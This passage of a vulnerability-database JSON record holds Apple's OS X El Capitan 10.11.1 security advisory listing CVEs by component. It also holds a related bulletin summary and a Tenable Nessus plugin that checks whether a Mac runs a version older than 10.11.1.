These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-6992 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-6975 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-7017 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nCoreText\r\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-5944 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nDisk Images\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in the parsing of\r\ndisk images. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-6995 : Ian Beer of Google Project Zero\r\n\r\nEFI\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: An attacker can exercise unused EFI functions\r\nDescription: An issue existed with EFI argument handling. 
This was\r\naddressed by removing the affected functions.\r\nCVE-ID\r\nCVE-2015-7035 : Corey Kallenberg, Xeno Kovah, John Butterworth, and\r\nSam Cornwell of The MITRE Corporation, coordinated via CERT/CC\r\n\r\nFile Bookmark\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Browsing to a folder with malformed bookmarks may cause\r\nunexpected application termination\r\nDescription: An input validation issue existed in parsing bookmark\r\nmetadata. This issue was addressed through improved validation\r\nchecks.\r\nCVE-ID\r\nCVE-2015-6987 : Luca Todesco (@qwertyoruiop)\r\n\r\nFontParser\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-5927 : Apple\r\nCVE-2015-5942\r\nCVE-2015-6976 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-6977 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-6978 : Jaanus Kääp, Clarified Security, working with HP's Zero\r\nDay Initiative\r\nCVE-2015-6991 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-6993 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7009 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7010 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7018 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nFontParser\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted font file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nhandling of font files. 
These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-6990 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-7008 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nGrand Central Dispatch\r\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted package may lead to\r\narbitrary code execution\r\nDescription: A memory corruption issue existed in the handling of\r\ndispatch calls. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-6989 : Apple\r\n\r\nGraphics Drivers\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to cause unexpected system\r\ntermination or read kernel memory\r\nDescription: Multiple out of bounds read issues existed in the\r\nNVIDIA graphics driver. These issues were addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-7019 : Ian Beer of Google Project Zero\r\nCVE-2015-7020 : Moony Li of Trend Micro\r\n\r\nGraphics Drivers\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to execute arbitrary code with\r\nkernel privileges\r\nDescription: A memory corruption issue existed in the kernel. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-7021 : Moony Li of Trend Micro\r\n\r\nImageIO\r\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\r\nImpact: Processing a maliciously crafted image file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nparsing of image metadata. 
These issues were addressed through\r\nimproved metadata validation.\r\nCVE-ID\r\nCVE-2015-5935 : Apple\r\nCVE-2015-5938 : Apple\r\n\r\nImageIO\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted image file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nparsing of image metadata. These issues were addressed through\r\nimproved metadata validation.\r\nCVE-ID\r\nCVE-2015-5936 : Apple\r\nCVE-2015-5937 : Apple\r\nCVE-2015-5939 : Apple\r\n\r\nIOAcceleratorFamily\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in\r\nIOAcceleratorFamily. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-6996 : Ian Beer of Google Project Zero\r\n\r\nIOHIDFamily\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with kernel privileges\r\nDescription: A memory corruption issue existed in the kernel. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-6974 : Luca Todesco (@qwertyoruiop)\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10.5\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A type confusion issue existed in the validation of\r\nMach tasks. 
This issue was addressed through improved Mach task\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5932 : Luca Todesco (@qwertyoruiop), Filippo Bigarella\r\n\r\nKernel\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: An attacker with a privileged network position may be able\r\nto execute arbitrary code\r\nDescription: An uninitialized memory issue existed in the kernel.\r\nThis issue was addressed through improved memory initialization.\r\nCVE-ID\r\nCVE-2015-6988 : The Brainy Code Scanner (m00nbsd)\r\n\r\nKernel\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local application may be able to cause a denial of service\r\nDescription: An issue existed when reusing virtual memory. This\r\nissue was addressed through improved validation.\r\nCVE-ID\r\nCVE-2015-6994 : Mark Mentovai of Google Inc.\r\n\r\nlibarchive\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: A malicious application may be able to overwrite arbitrary\r\nfiles\r\nDescription: An issue existed within the path validation logic for\r\nsymlinks. This issue was addressed through improved path\r\nsanitization.\r\nCVE-ID\r\nCVE-2015-6984 : Christopher Crone of Infinit, Jonathan Schleifer\r\n\r\nMCX Application Restrictions\r\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\r\nImpact: A developer-signed executable may acquire restricted\r\nentitlements\r\nDescription: An entitlement validation issue existed in Managed\r\nConfiguration. A developer-signed app could bypass restrictions on\r\nuse of restricted entitlements and elevate privileges. This issue was\r\naddressed through improved provisioning profile validation.\r\nCVE-ID\r\nCVE-2015-7016 : Apple\r\n\r\nNet-SNMP\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: An attacker in a privileged network position may be able to\r\ncause a denial of service\r\nDescription: Multiple issues existed in netsnmp version 5.6. 
These\r\nissues were addressed by using patches affecting OS X from upstream.\r\nCVE-ID\r\nCVE-2012-6151\r\nCVE-2014-3565\r\n\r\nOpenGL\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: A memory corruption issue existed in OpenGL. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5924 : Apple\r\n\r\nOpenSSH\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to conduct impersonation attacks\r\nDescription: A privilege separation issue existed in PAM support.\r\nThis issue was addressed with improved authorization checks.\r\nCVE-ID\r\nCVE-2015-6563 : Moritz Jodeit of Blue Frost Security GmbH\r\n\r\nSandbox\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to execute arbitrary code with\r\nkernel privileges\r\nDescription: An input validation issue existed when handling NVRAM\r\nparameters. This issue was addressed through improved validation.\r\nCVE-ID\r\nCVE-2015-5945 : Rich Trouton (@rtrouton), Howard Hughes Medical\r\nInstitute, Apple\r\n\r\nScript Editor\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: An attacker may trick a user into running arbitrary\r\nAppleScript\r\nDescription: In some circumstances, Script Editor did not ask for\r\nuser confirmation before executing AppleScripts. This issue was\r\naddressed by prompting for user confirmation before executing\r\nAppleScripts.\r\nCVE-ID\r\nCVE-2015-7007 : Joe Vennix of Rapid7\r\n\r\nSecurity\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to overwrite arbitrary\r\nfiles\r\nDescription: A double free issue existed in the handling of\r\nAtomicBufferedFile descriptors. 
This issue was addressed through\r\nimproved validation of AtomicBufferedFile descriptors.\r\nCVE-ID\r\nCVE-2015-6983 : David Benjamin, Greg Kerr, Mark Mentovai and Sergey\r\nUlanov from the Chrome Team\r\n\r\nSecurityAgent\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application can programmatically control\r\nkeychain access prompts\r\nDescription: A method existed for applications to create synthetic\r\nclicks on keychain prompts. This was addressed by disabling synthetic\r\nclicks for keychain access windows.\r\nCVE-ID\r\nCVE-2015-5943\r\n\r\nInstallation note:\r\n\r\nOS X El Capitan v10.11.1 includes the security content of\r\nSafari 9.0.1: https://support.apple.com/kb/HT205377\r\n\r\nOS X El Capitan 10.11.1 and Security Update 2015-007 may be obtained\r\nfrom the Mac App Store or Apple's Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n", "edition": 1, "modified": "2015-10-25T00:00:00", "published": "2015-10-25T00:00:00", "id": "SECURITYVULNS:DOC:32566", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32566", "title": "APPLE-SA-2015-10-21-4 OS X El Capitan 10.11.1 and Security Update 2015-007", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-5883", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-5903", "CVE-2015-6976", "CVE-2015-7007", "CVE-2015-0235", "CVE-2015-2783", "CVE-2015-5877", "CVE-2015-5927", "CVE-2015-3785", "CVE-2015-5847", "CVE-2014-9427", "CVE-2015-3329", "CVE-2015-6975", "CVE-2015-3415", "CVE-2015-7035", "CVE-2015-3330", 
"CVE-2015-6987", "CVE-2015-5922", "CVE-2015-5865", "CVE-2015-5869", "CVE-2015-5879", "CVE-2015-7003", "CVE-2015-5876", "CVE-2015-5858", "CVE-2015-5924", "CVE-2015-5862", "CVE-2015-0286", "CVE-2015-5888", "CVE-2015-6983", "CVE-2015-5939", "CVE-2015-5874", "CVE-2015-6834", "CVE-2015-6991", "CVE-2015-5860", "CVE-2015-1855", "CVE-2015-7020", "CVE-2014-3618", "CVE-2015-6994", "CVE-2015-1352", "CVE-2015-7016", "CVE-2015-6992", "CVE-2015-2301", "CVE-2015-7021", "CVE-2015-6977", "CVE-2015-5868", "CVE-2014-3565", "CVE-2015-5872", "CVE-2015-5839", "CVE-2015-5840", "CVE-2014-6277", "CVE-2014-9425", "CVE-2014-9709", "CVE-2015-2305", "CVE-2012-6151", "CVE-2015-5934", "CVE-2015-5873", "CVE-2015-5940", "CVE-2015-5932", "CVE-2015-0273", "CVE-2015-5875", "CVE-2015-5882", "CVE-2015-5842", "CVE-2015-6995", "CVE-2015-6978", "CVE-2015-7018", "CVE-2015-5912", "CVE-2015-6985", "CVE-2015-2331", "CVE-2015-5870", "CVE-2015-5935", "CVE-2015-5722", "CVE-2015-7010", "CVE-2015-5945", "CVE-2015-6984", "CVE-2015-7008", "CVE-2015-5841", "CVE-2015-5894", "CVE-2015-5881", "CVE-2014-2532", "CVE-2015-5831", "CVE-2014-8147", "CVE-2015-5937", "CVE-2015-5878", "CVE-2015-5855", "CVE-2015-7023", "CVE-2014-8611", "CVE-2015-6993", "CVE-2015-5871", "CVE-2015-5866", "CVE-2015-5901", "CVE-2014-8090", "CVE-2015-6836", "CVE-2015-5884", "CVE-2015-3416", "CVE-2015-5936", "CVE-2015-5889", "CVE-2015-5867", "CVE-2015-5836", "CVE-2015-6989", "CVE-2015-5915", "CVE-2015-5900", "CVE-2015-5942", "CVE-2015-7015", "CVE-2015-5890", "CVE-2014-7187", "CVE-2014-8146", "CVE-2015-5854", "CVE-2015-6990", "CVE-2015-3414", "CVE-2015-7009", "CVE-2014-9652", "CVE-2015-7031", "CVE-2015-6988", "CVE-2015-5523", "CVE-2015-5986", "CVE-2015-5943", "CVE-2015-5885", "CVE-2015-6996", "CVE-2015-6837", "CVE-2013-3951", "CVE-2015-6563", "CVE-2015-5944", "CVE-2015-5893", "CVE-2015-5917", "CVE-2014-8080", "CVE-2015-1351", "CVE-2015-5524", "CVE-2015-5887", "CVE-2015-5902", "CVE-2015-5925", "CVE-2015-5938", "CVE-2015-0287", "CVE-2015-6974", 
"CVE-2015-5853", "CVE-2015-6835", "CVE-2015-5897", "CVE-2015-5830", "CVE-2015-5849", "CVE-2015-5896", "CVE-2015-5833", "CVE-2015-5863", "CVE-2015-0231", "CVE-2015-5864", "CVE-2014-7186", "CVE-2015-5891", "CVE-2015-7019", "CVE-2015-7006", "CVE-2015-7017", "CVE-2015-5914", "CVE-2015-5926", "CVE-2015-5522", "CVE-2015-5851", "CVE-2015-5899", "CVE-2015-6838", "CVE-2015-5933"], "description": "Code execution, information disclosure, restrictions bypass, multiple memory corruptions, multiple libraries vulnerabilities.", "edition": 1, "modified": "2015-10-25T00:00:00", "published": "2015-10-25T00:00:00", "id": "SECURITYVULNS:VULN:14702", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14702", "title": "Apple Mac OS X / Mac EFI / OS X Server multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-03-01T03:40:08", "description": "The remote host is running a version of Mac OS X that is 10.9.5 or\nlater but prior to 10.11.1 It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273,\n CVE-2015-6834, CVE-2015-6835, CVE-2015-6836,\n CVE-2015-6837, CVE-2015-6838)\n\n - ATS (CVE-2015-6985)\n\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n\n - Bom (CVE-2015-7006)\n\n - CFNetwork (CVE-2015-7023)\n\n - configd (CVE-2015-7015)\n\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992,\n CVE-2015-7017)\n\n - Directory Utility (CVE-2015-6980)\n\n - Disk Images (CVE-2015-6995)\n\n - EFI (CVE-2015-7035)\n\n - File Bookmark (CVE-2015-6987)\n\n - FontParser (CVE-2015-5927, CVE-2015-5942, CVE-2015-6976,\n CVE-2015-6977, CVE-2015-6978, CVE-2015-6990,\n CVE-2015-6991, CVE-2015-6993, CVE-2015-7008,\n CVE-2015-7009, CVE-2015-7010, CVE-2015-7018)\n\n - Grand Central 
Dispatch (CVE-2015-6989)\n\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020,\n CVE-2015-7021)\n\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937,\n CVE-2015-5938, CVE-2015-5939)\n\n - IOAcceleratorFamily (CVE-2015-6996)\n\n - IOHIDFamily (CVE-2015-6974)\n\n - Kernel (CVE-2015-5932, CVE-2015-6988, CVE-2015-6994)\n\n - libarchive (CVE-2015-6984)\n\n - MCX Application Restrictions (CVE-2015-7016)\n\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n\n - OpenGL (CVE-2015-5924)\n\n - OpenSSH (CVE-2015-6563)\n\n - Sandbox (CVE-2015-5945)\n\n - Script Editor (CVE-2015-7007)\n\n - Security (CVE-2015-6983, CVE-2015-7024)\n\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.", "edition": 26, "published": "2015-10-29T00:00:00", "title": "Mac OS X < 10.11.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-6976", "CVE-2015-7007", "CVE-2015-6980", "CVE-2015-0235", "CVE-2015-5927", "CVE-2015-6975", "CVE-2015-7035", "CVE-2015-6987", "CVE-2015-7003", "CVE-2015-5924", "CVE-2015-6983", "CVE-2015-5939", "CVE-2015-6834", "CVE-2015-6991", "CVE-2015-7020", "CVE-2015-6994", "CVE-2015-7016", "CVE-2015-6992", "CVE-2015-7021", "CVE-2015-6977", "CVE-2014-3565", "CVE-2015-7024", "CVE-2012-6151", "CVE-2015-5934", "CVE-2015-5940", "CVE-2015-5932", "CVE-2015-0273", "CVE-2015-6995", "CVE-2015-6978", "CVE-2015-7018", "CVE-2015-6985", "CVE-2015-5935", "CVE-2015-7010", "CVE-2015-5945", "CVE-2015-6984", "CVE-2015-7008", "CVE-2015-5937", "CVE-2015-7023", "CVE-2015-6993", "CVE-2015-6836", "CVE-2015-5936", "CVE-2015-6989", "CVE-2015-5942", "CVE-2015-7015", "CVE-2015-6990", "CVE-2015-7009", "CVE-2015-6988", "CVE-2015-5943", "CVE-2015-6996", "CVE-2015-6837", "CVE-2015-6563", "CVE-2015-5944", "CVE-2015-5925", "CVE-2015-5938", "CVE-2015-6974", "CVE-2015-6835", "CVE-2015-7019", "CVE-2015-7006", "CVE-2015-7017", "CVE-2015-5926", "CVE-2015-6838", "CVE-2015-5933"], "modified": 
"2021-03-02T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_10_11_1.NASL", "href": "https://www.tenable.com/plugins/nessus/86654", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86654);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2012-6151\",\n \"CVE-2014-3565\",\n \"CVE-2015-0235\",\n \"CVE-2015-0273\",\n \"CVE-2015-5924\",\n \"CVE-2015-5925\",\n \"CVE-2015-5926\",\n \"CVE-2015-5927\",\n \"CVE-2015-5932\",\n \"CVE-2015-5933\",\n \"CVE-2015-5934\",\n \"CVE-2015-5935\",\n \"CVE-2015-5936\",\n \"CVE-2015-5937\",\n \"CVE-2015-5938\",\n \"CVE-2015-5939\",\n \"CVE-2015-5940\",\n \"CVE-2015-5942\",\n \"CVE-2015-5943\",\n \"CVE-2015-5944\",\n \"CVE-2015-5945\",\n \"CVE-2015-6563\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\",\n \"CVE-2015-6974\",\n \"CVE-2015-6975\",\n \"CVE-2015-6976\",\n \"CVE-2015-6977\",\n \"CVE-2015-6978\",\n \"CVE-2015-6980\",\n \"CVE-2015-6983\",\n \"CVE-2015-6984\",\n \"CVE-2015-6985\",\n \"CVE-2015-6987\",\n \"CVE-2015-6988\",\n \"CVE-2015-6989\",\n \"CVE-2015-6990\",\n \"CVE-2015-6991\",\n \"CVE-2015-6992\",\n \"CVE-2015-6993\",\n \"CVE-2015-6994\",\n \"CVE-2015-6995\",\n \"CVE-2015-6996\",\n \"CVE-2015-7003\",\n \"CVE-2015-7006\",\n \"CVE-2015-7007\",\n \"CVE-2015-7008\",\n \"CVE-2015-7009\",\n \"CVE-2015-7010\",\n \"CVE-2015-7015\",\n \"CVE-2015-7016\",\n \"CVE-2015-7017\",\n \"CVE-2015-7018\",\n \"CVE-2015-7019\",\n \"CVE-2015-7020\",\n \"CVE-2015-7021\",\n \"CVE-2015-7023\",\n \"CVE-2015-7024\",\n \"CVE-2015-7035\"\n );\n script_bugtraq_id(\n 64048,\n 69477,\n 72325,\n 72701,\n 74971,\n 76317,\n 76644,\n 76649,\n 76733,\n 76734,\n 76738,\n 77263,\n 77265,\n 77266,\n 77270\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-10-21-4\");\n\n script_name(english:\"Mac OS X < 10.11.1 Multiple Vulnerabilities\");\n 
script_summary(english:\"Checks the version of Mac OS X.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is 10.9.5 or\nlater but prior to 10.11.1 It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - Accelerate Framework (CVE-2015-5940)\n\n - apache_mod_php (CVE-2015-0235, CVE-2015-0273,\n CVE-2015-6834, CVE-2015-6835, CVE-2015-6836,\n CVE-2015-6837, CVE-2015-6838)\n\n - ATS (CVE-2015-6985)\n\n - Audio (CVE-2015-5933, CVE-2015-5934, CVE-2015-7003)\n\n - Bom (CVE-2015-7006)\n\n - CFNetwork (CVE-2015-7023)\n\n - configd (CVE-2015-7015)\n\n - CoreGraphics (CVE-2015-5925, CVE-2015-5926)\n\n - CoreText (CVE-2015-5944, CVE-2015-6975, CVE-2015-6992,\n CVE-2015-7017)\n\n - Directory Utility (CVE-2015-6980)\n\n - Disk Images (CVE-2015-6995)\n\n - EFI (CVE-2015-7035)\n\n - File Bookmark (CVE-2015-6987)\n\n - FontParser (CVE-2015-5927, CVE-2015-5942, CVE-2015-6976,\n CVE-2015-6977, CVE-2015-6978, CVE-2015-6990,\n CVE-2015-6991, CVE-2015-6993, CVE-2015-7008,\n CVE-2015-7009, CVE-2015-7010, CVE-2015-7018)\n\n - Grand Central Dispatch (CVE-2015-6989)\n\n - Graphics Drivers (CVE-2015-7019, CVE-2015-7020,\n CVE-2015-7021)\n\n - ImageIO (CVE-2015-5935, CVE-2015-5936, CVE-2015-5937,\n CVE-2015-5938, CVE-2015-5939)\n\n - IOAcceleratorFamily (CVE-2015-6996)\n\n - IOHIDFamily (CVE-2015-6974)\n\n - Kernel (CVE-2015-5932, CVE-2015-6988, CVE-2015-6994)\n\n - libarchive (CVE-2015-6984)\n\n - MCX Application Restrictions (CVE-2015-7016)\n\n - Net-SNMP (CVE-2014-3565, CVE-2012-6151)\n\n - OpenGL (CVE-2015-5924)\n\n - OpenSSH (CVE-2015-6563)\n\n - Sandbox (CVE-2015-5945)\n\n - Script Editor (CVE-2015-7007)\n\n - Security (CVE-2015-6983, CVE-2015-7024)\n\n - SecurityAgent (CVE-2015-5943)\n\nNote that successful exploitation of the most 
serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT205375\");\n # https://lists.apple.com/archives/security-announce/2015/Oct/msg00005.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7e01da3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mac OS X 10.11.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari User-Assisted Applescript Exec Attack');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif 
(!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Cannot determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nmatch = eregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (isnull(match)) exit(1, \"Failed to parse the Mac OS X version ('\" + os + \"').\");\n\nversion = match[1];\n\nif (\n version !~ \"^10\\.11([^0-9]|$)\"\n) audit(AUDIT_OS_NOT, \"Mac OS X 10.11 or later\", \"Mac OS X \"+version);\n\nfixed_version = \"10.11.1\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected since it is running Mac OS X \"+version+\".\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}